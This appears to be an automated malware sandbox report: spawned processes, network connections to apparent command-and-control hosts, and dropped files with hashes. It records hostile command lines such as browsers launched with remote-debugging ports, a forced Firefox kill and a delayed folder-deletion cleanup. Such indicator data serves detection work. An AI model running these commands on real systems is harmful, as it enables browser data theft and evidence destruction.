"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2160,14364008422099112018,12471598033881135739,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe

"C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe

"C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\2n790" & exit

C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe

"C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe

"C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe"

C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe

"C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5956 -ip 5956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5956 -s 808

C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe

"C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe"

C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe

"C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe"

C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe

"C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe"

C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe

"C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9af06cc40,0x7ff9af06cc4c,0x7ff9af06cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2052 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1932,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2100 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2296,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2504 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3256 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3828,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4560 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4584,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4732 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4812 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe

"C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4876,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4944,i,3831091204550679769,12127651391525930363,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4864 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.75:80 185.215.113.75 tcp
US 8.8.8.8:53 advertised.life udp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 fua.4t.com udp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.23.210.75:80 e6.o.lencr.org tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com tcp
DE 109.120.178.136:80 109.120.178.136 tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.169.78:443 clients2.google.com udp
GB 172.217.169.78:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
DE 94.130.190.206:443 fua.4t.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 185.198.234.185:80 cobolrationumelawrtewarms.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
NL 185.156.73.73:80 185.156.73.73 tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 investiigato.website udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 breakfasutwy.cyou udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 importenptoc.com udp
US 8.8.8.8:53 voicesharped.com udp
US 8.8.8.8:53 inputrreparnt.com udp
US 8.8.8.8:53 torpdidebar.com udp
US 8.8.8.8:53 rebeldettern.com udp
US 8.8.8.8:53 actiothreaz.com udp
US 8.8.8.8:53 garulouscuto.com udp
US 8.8.8.8:53 breedertremnd.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 outlinedtrai.bet udp
US 104.21.38.27:443 outlinedtrai.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 edcatiofireeu.shop udp
US 8.8.8.8:53 impolitewearr.biz udp
US 8.8.8.8:53 toppyneedus.biz udp
US 8.8.8.8:53 lightdeerysua.biz udp
US 8.8.8.8:53 suggestyuoz.biz udp
US 8.8.8.8:53 hoursuhouy.biz udp
US 8.8.8.8:53 mixedrecipew.biz udp
US 8.8.8.8:53 affordtempyo.biz udp
US 8.8.8.8:53 pleasedcfrown.biz udp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 109.120.178.136:80 109.120.178.136 tcp
US 8.8.8.8:53 investiigato.website udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
RU 185.215.113.115:80 185.215.113.115 tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com udp
GB 142.250.187.202:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 tcp
GB 172.217.169.78:443 udp
GB 172.217.169.78:443 tcp

Files

memory/3680-0-0x0000000000660000-0x0000000000B30000-memory.dmp

memory/3680-1-0x0000000077CF4000-0x0000000077CF6000-memory.dmp

memory/3680-2-0x0000000000661000-0x00000000006C9000-memory.dmp

memory/3680-3-0x0000000000660000-0x0000000000B30000-memory.dmp

memory/3680-4-0x0000000000660000-0x0000000000B30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 a3ec4b44e7677c12a76bf51f45480133
SHA1 15587b7a0420115e979461490689a79beca64118
SHA256 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
SHA512 4d1dfb16076f0fd17c2d6a0bfe221af69dda9bf7e75f82a13f64e5bd732ff56e7f42b36864b0e07c3ae78bcb459124e700640e03ba0a416121ae7146ea4bf075

memory/3652-19-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3680-16-0x0000000000661000-0x00000000006C9000-memory.dmp

memory/3680-15-0x0000000000660000-0x0000000000B30000-memory.dmp

memory/3652-20-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3652-21-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3652-22-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3652-23-0x0000000000270000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

MD5 515748a93ce7beb3f4416ec66ba8488e
SHA1 3ba2f1a56dcc91967361622c56b1ba545cda4325
SHA256 a09d49280077ed84d72c5b39977a67155f7bf1bc12615fecb6ec81a0aa2f92a6
SHA512 3ce752a103a11b4ef84e6531f4feebcd70f5dfde979e3952709a686fb03e67741d894037406fc23fc5ea3b506d650653a01f3ef48fd7b5a44f79e45c8eb96ffb

memory/3652-41-0x0000000000270000-0x0000000000740000-memory.dmp

memory/3652-42-0x0000000000270000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

MD5 896dc9ae02a4b0cf429b4346a3990fae
SHA1 17f297bb4cf3acd07078fc5d73c1d6564a8c0710
SHA256 6498189cc01fc00d92663abc7f60c27326ba5f059f1b2c4f499ed2856722d8a2
SHA512 e642b273a2cc01a32cede4d3400a910825d89d117333e0a96488721636783b9065f081ace394af0c484be4e60ab5249b390e840aeaa4115920e976fbd632851c

memory/2672-58-0x0000000000140000-0x00000000001F0000-memory.dmp

memory/2672-59-0x0000000005060000-0x0000000005604000-memory.dmp

memory/2532-61-0x0000000000400000-0x000000000045F000-memory.dmp

memory/2532-63-0x0000000000400000-0x000000000045F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

MD5 87da0483aefde76a5086c5b2ea14304f
SHA1 ae6b27aeaf487666c71b26397709004e65b09002
SHA256 33f44b2fa9a46ef2ce1d03303d8f959e070ba8a1109ad302b5461ad74ef99c4f
SHA512 ca28949636f5d32e161b81d993a22839d65aea050ba7f8452ca70b6a2c8fd7385adbb9f2e5ad7da8edd3956b9d222452d5b86684ff0c7f3e2dc86930820f65e4

memory/4420-78-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1728-80-0x000001609E0E0000-0x000001609E1C0000-memory.dmp

memory/1728-81-0x000001609E1C0000-0x000001609E272000-memory.dmp

memory/1728-82-0x000001609E3B0000-0x000001609E3D2000-memory.dmp

memory/3652-89-0x0000000000270000-0x0000000000740000-memory.dmp

memory/1728-90-0x00007FF6551E0000-0x00007FF65569B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe

MD5 5b0bf9144e2661027c1621957b1ef278
SHA1 589efc0736ecc18d94e4dd8d353502e8d76738c4
SHA256 a4337bb42c32b5dd68fef60740164ec01ee3f94ecc8345f4d396eea82f96b21f
SHA512 e0b10ecfbd4e241a78653a05ed1b65f89fe4c25109fd1276d0091d834ee9e90d3f4c253b506ab508cfd81ba65214a0917d6fe902873ccc1f179fae57b6db2177

C:\Users\Admin\AppData\Local\Temp\J7AzTdxv3.hta

MD5 c9e49fd88e8ecea5cbee7d03b4293861
SHA1 35837984f21ebbb1198b0b7b002e2c0e4cdc3608
SHA256 5f3e1d37a3b860a6e9d00ae267eee53dab3253d9ad6bf1413ad2563d575e69f7
SHA512 64f7f52c5e99d1d9c63858ba251f2be883cb8755da3b9427201ebf2799eebffe50d485b7fa39a949d02b07caf1ecd5829eaf6515ba9142d01a4987d149b3738d

memory/2036-111-0x0000000004E80000-0x0000000004EB6000-memory.dmp

memory/2036-114-0x00000000054F0000-0x0000000005B18000-memory.dmp

memory/1728-113-0x000001609E500000-0x000001609E576000-memory.dmp

memory/1728-112-0x000001609E430000-0x000001609E480000-memory.dmp

memory/2036-115-0x0000000005470000-0x0000000005492000-memory.dmp

memory/2036-117-0x0000000005E30000-0x0000000005E96000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1nhxef2m.14d.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2036-116-0x0000000005D50000-0x0000000005DB6000-memory.dmp

memory/1728-127-0x000001609E3E0000-0x000001609E3FE000-memory.dmp

memory/2036-128-0x0000000005FA0000-0x00000000062F4000-memory.dmp

memory/2036-129-0x0000000006410000-0x000000000642E000-memory.dmp

memory/2036-130-0x0000000006440000-0x000000000648C000-memory.dmp

\??\pipe\crashpad_3848_SZFJSPXQGKOCNDBG

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2036-140-0x0000000007B60000-0x00000000081DA000-memory.dmp

memory/2036-141-0x0000000006920000-0x000000000693A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

memory/2036-176-0x0000000007900000-0x0000000007996000-memory.dmp

memory/2036-177-0x0000000007890000-0x00000000078B2000-memory.dmp

C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE

MD5 03a574d64f0e62c5e117a5f5acf137e4
SHA1 93ba2b5bdac91342c9eeaeaf3e44cc1793ee6d90
SHA256 dcc540b3c86a167bb0cf71e8d4598f7566fe0f625d64ffe7a37f0d5f502be747
SHA512 d1b76d82c522ccb157dcd5155011619b36baf3516cf08cb6bc98fb9bc009230e5c53d77f5d8adc0e85dde678b4b3542823919ee6490533df8250078caca1b9b1

memory/2244-188-0x0000000000320000-0x0000000000772000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 79edfcad204b58d0d253b6b07dd89666
SHA1 e0146db72f42ec2203e247f98b807f869b9e3b09
SHA256 7c55e876b26f82092dbdb2d1a2f72e5cd7ee8ed7d1321fafd8f82cb04d86911b
SHA512 9115af0f28ceef45a915a35076aaf29b8bf1fd13c3a892a328e91d0ecac4bcd532aefaf1b1e9f074e37667dfb859a4745a49fb3b96cfb62f5df118f65d2ebbdd

memory/2244-201-0x0000000000320000-0x0000000000772000-memory.dmp

memory/2244-202-0x0000000000320000-0x0000000000772000-memory.dmp

memory/4420-203-0x0000000000400000-0x000000000086A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/544-213-0x0000000005750000-0x0000000005AA4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a2f9d7e4603622375a876763333b3c90
SHA1 ef0f78ac9b12160ee781630e137c4679b21f211c
SHA256 beda4c42cf4950c09a1f6f0d80d8377f50fb4ec03c38327667448c5bc30e18ee
SHA512 d3eb0501140d7c2f76fa1c1bf2eac6de679f2ab245f35b33af6d36fa9ede9dd3c3d48a27947f0efbc1b74b2d5f8f1c23ede6ed225ca8d397431c726835e3be45

memory/544-220-0x0000000005FD0000-0x000000000601C000-memory.dmp

memory/4420-222-0x0000000000400000-0x000000000086A000-memory.dmp

memory/1080-224-0x0000000005FB0000-0x0000000006304000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bbe1b153b6236459b044a6d7ea9eadb9
SHA1 933d0800358caf244ed2cd546bf21edb0c3ad864
SHA256 d0694392593ae0a0d6d3e2bc4bb3e91f6d852e09841f4b1fc9eba100a867dcc7
SHA512 b9bbfe590b424493affff1b231ec5239ec10b3b946d4f72d8d24dd612daf633026b6f6d7b68ab5d2b6cd063a5825ef7071c2fed908ccf6f1c87846c18d904c58

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

MD5 41e7a544f14c8eeda7675b6f8fc2f267
SHA1 98585d0462f44ace4216e00c0ae33f7b3606e0d4
SHA256 b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843
SHA512 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef

C:\Temp\f71Q9b6DZ.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

memory/4416-253-0x0000000000440000-0x000000000076E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 805458c8ea4e1da2b176438c184c5b3b
SHA1 c7bb8950d70e57b773f7720a535d0df73b92ed18
SHA256 80b506911a8e1fff8f7e2a98b050302cd8a68703df811e1e98faaccfb4bf361b
SHA512 dcf1d11f7da1c86ae4e3ec8d141dadda289dd2ff1796ef9c7b1208ce7c83de566db551ca026b620e7007fe926a3aff5d042905bcc58082a21394a04df73a9cb8

memory/4504-264-0x00000000066E0000-0x000000000672C000-memory.dmp

memory/5268-277-0x00000000006D0000-0x00000000009FE000-memory.dmp

memory/4416-279-0x0000000000440000-0x000000000076E000-memory.dmp

memory/3652-276-0x0000000000270000-0x0000000000740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 d433e1dc943e6ea29d67cf72d2f6fecd
SHA1 9964aa3e596d93673c4d84695dc94d6f1a9766cd
SHA256 a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5
SHA512 caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43

